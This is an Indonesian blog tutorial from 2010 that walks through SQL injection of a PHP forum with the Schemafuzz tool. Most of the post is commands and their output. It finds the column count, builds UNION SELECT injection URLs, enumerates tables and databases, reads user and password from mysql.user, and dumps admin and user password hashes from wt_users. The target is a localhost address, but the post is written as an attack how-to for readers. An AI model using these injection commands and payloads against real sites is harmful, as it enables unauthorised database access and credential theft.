Friday 4 June 2010

SQLi With Schemafuzz

Langsung aja tutornya ya
siapkan alat dan bahan sebagai berikut :
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://www.beenuarora.com/code/schemafuzz.py)
3.CMD
4.Konsole (bagi pengguna linux)

bagi pengguna windust ikuti langkah berikut
buka menu CMD kemudian masuk kedalam directori Cdengan menggunakan perintah
cd c:\ enter
c:\>schemafuzz.py enter

Bagi pengguna linux tinggal mengetikkan di konsloe perintah berikut

./schemafuz.py enter

oke :)
setalah masuk ke direktory schemafuzz
tingal ikuti langkah selanjutnya

1.Cari target
Misal: http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

–schema, –dbs, –dump, –fuzz, –info, –full, –findcol

langkah pertama

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1″ –findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1–

[+] Evasion Used: “+” “–”

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns…

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5–

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!

langkah kedua

————–

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns…

[+] Found a table called: mysql.user

[+] Now searching for columns inside table “mysql.user”

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table “mysql.user” for columns!

[-] [01:37:48]

[-] Total URL Requests 618

[-] Done

langkah ketiga

—————

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D namadatabasenya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database “webthings”

[+] Number of Tables: 33

[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,
author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,
full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,
count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,
city,state,icq,aim,sex,session,active,comments,

newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,
newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]

[-] Total URL Requests 270

[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –info

maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <– w00t w00t

[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0×3a,password),2,3,4,5+FROM+mysql.user–

[+] Do we have Access to Load_File: No

[-] [01:46:51]

[-] Total URL Requests 3

[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dbs

akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:58:15

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] webthings

[-] [01:58:17]

[-] Total URL Requests 30

[-] Done

langkah selanjutnya

——————–

cara untuk menemukan user dan password

kita gunakan perintah –dump -D namadatabase -T namatabel -C namakolom

setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dump -D webthing -T wt_users -C name,password

eing ing eng….

jreennnng….keluar deh user ama passwordnya

hasilnya dibawah ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 02:08:47

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Dumping data from database “webthings” Table “wt_users”

[+] Column(s) ['name', 'password']

[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:

[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]

[-] Total URL Requests 4

[-] Done

jangan lupa kita selalu mengecek schemafuzzlog.txt nya


0 comments:

Post a Comment